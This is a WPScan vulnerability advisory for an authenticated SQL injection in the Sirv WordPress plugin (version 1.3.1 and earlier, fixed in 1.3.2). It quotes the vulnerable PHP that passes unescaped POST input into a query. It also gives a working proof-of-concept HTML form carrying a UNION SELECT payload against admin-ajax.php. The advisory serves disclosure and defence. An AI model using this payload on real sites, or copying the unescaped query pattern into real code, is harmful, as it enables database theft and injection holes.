Sirv <= 1.3.1 - Authenticated SQL Injection

Description

$_POST[ ‘id’ ] is not escaped. sirv_get_row_by_id() is accessible for every registered user.

$id = $_POST['row_id'];

    $row =  $wpdb->get_row("SELECT * FROM $table_name WHERE id = $id", ARRAY_A);

    $row['images'] = unserialize($row['images']);

    echo json_encode($row);

Proof of Concept

<form method="post" action="http://target/wp-admin/admin-ajax.php">
    <input type="text" name="row_id" value="0 UNION SELECT 1, name,slug, term_group, 6, 7, 8, 9, 10, 11, 12 FROM wp_terms WHERE term_id=1">
    <input type="text" name="action" value="sirv_get_row_by_id">
    <input type="submit" value="Send">
</form>

Affects Plugin

sirv

fixed in version 1.3.2

References

EXPLOITDB	40772
URL	http://lenonleite.com.br/en/blog/2016/11/10/sirv-1-3-1-plugin-for-wordpress/

Classification

Type	SQLI
OWASP Top 10	A1: Injection
CWE	CWE-89

Miscellaneous

Submitter	Lenon Leite
Submitter Website	http://lenonleite.com.br/en/blog/2016/11/10/sirv-1-3-1-plugin-for-wordpress/
Submitter Twitter	lenonleite
Views	859
Verified	No
WPVDB ID	8673

Timeline

Publicly Published	2016-11-10 (about 2 years ago)
Added	2016-11-21 (almost 2 years ago)
Last Updated	2016-11-21 (almost 2 years ago)

Copyright & License

Copyright	All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License	Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.